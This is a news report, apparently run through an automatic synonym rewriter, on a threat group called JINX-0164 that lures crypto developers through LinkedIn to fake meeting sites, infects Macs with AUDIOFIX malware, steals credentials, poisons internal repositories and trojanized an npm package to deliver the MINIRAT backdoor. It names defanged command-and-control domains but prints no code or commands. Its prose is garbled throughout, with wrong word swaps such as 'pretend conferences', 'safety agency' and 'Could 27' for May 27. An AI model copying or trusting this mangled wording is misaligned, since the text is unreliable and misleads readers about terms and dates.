A gaggle of hackers, often known as JINX-0164, has been contacting crypto builders by way of LinkedIn and welcoming them to pretend conferences that result in the an infection of their machines with customized macOS malware.
The malware steals login credentials and hijacks the pipelines builders use to construct and deploy software program. Cloud safety agency Wiz printed its findings on Could 27, 2026.
Faux assembly hyperlink drops AUDIOFIX malware on devs machines
Wiz’s incident response group linked the group to assaults going again to at the least mid of 2025.
Attackers attain out to a developer on LinkedIn utilizing a profile that appears legit, recommend a enterprise name, and ship a hyperlink to a pretend web site made to seem like Microsoft Groups or an analogous video conferencing device.
AUDIOFIX is the macOS virus that silently begins set up when a sufferer clicks on what they consider to be a gathering URL. It operates on Intel and Apple Silicon Macs and is delivered by way of a script saved on a pretend Apple website. The virus units itself as much as proceed working after a restart, poses as a system audio part, and interacts with the attackers over HTTPS.
As soon as it’s on the machine, it collects saved passwords from the macOS Keychain, browser credentials, SSH keys, cloud entry tokens for AWS, GCP, and Azure, and crypto pockets knowledge. Moreover, Wiz found that the attackers had been straight phishing for passwords and storing them in encoded recordsdata.
JINX-0164 differs from different infostealers as a result of it goes after inner code repositories and improvement infrastructure.
In a case research from early 2026, Wiz documented how the attackers used stolen GitHub tokens to extract secrets and techniques from CI/CD pipelines with an open-source device referred to as nord-stream. They then injected their AUDIOFIX malware into inner repositories, impersonating legit builders by forging Git commit metadata and pushing malicious code to important branches or hijacking present ones.
Different builders who pulled and constructed from these poisoned repos bought contaminated mechanically. The group’s personal improvement workflow grew to become the distribution mechanism. GitHub’s Vigilant Mode, which flags commits missing verified GPG signatures, caught the impersonation in at the least one case.
The group additionally carried out a confirmed provide chain assault on a public npm bundle. On April 7, 2026, JINX-0164 trojanized model 4.9.1 of @velora-dex/sdk, injecting a base64-encoded command that fetched and executed a distant script deploying MINIRAT. That’s a light-weight Go-based backdoor centered on persistence and distant command execution.
Attackers goal money and code from crypto devs
AUDIOFIX and MINIRAT share command-and-control domains like datahub[.]ink, cloud-sync[.]on-line, and byte-io[.]us. The attackers route their exercise by means of Mullvad VPN, Astrill VPN, and ExpressVPN to cover their actual location.
Wiz discovered some tactical similarities with North Korean risk clusters UNC1069 and Sapphire Sleet, however discovered no direct infrastructure overlap. They’re calling JINX-0164 a definite and financially motivated risk actor.
In Could, hackers compromised 170+ npm and PyPI packages, together with the official Mistral AI Python library. That assault uncovered GitHub tokens and cloud credentials owned by crypto and AI builders. This was additionally the primary documented case of malicious packages carrying legitimate SLSA Construct Degree 3 provenance attestations, breaking the cryptographic belief mannequin meant to confirm construct integrity.
Hacking crypto and AI builders normally results in money and precious code. Crypto labs/corporations ought to strengthen cybersecurity measures and overview their CI/CD pipelines for any unauthorized entry or malicious actions. Unauthorized GitHub actions, commits with unverified signatures and strange VPN connections are all warning indicators. Builders who joined conferences despatched by way of LinkedIn ought to scan their computer systems for viruses.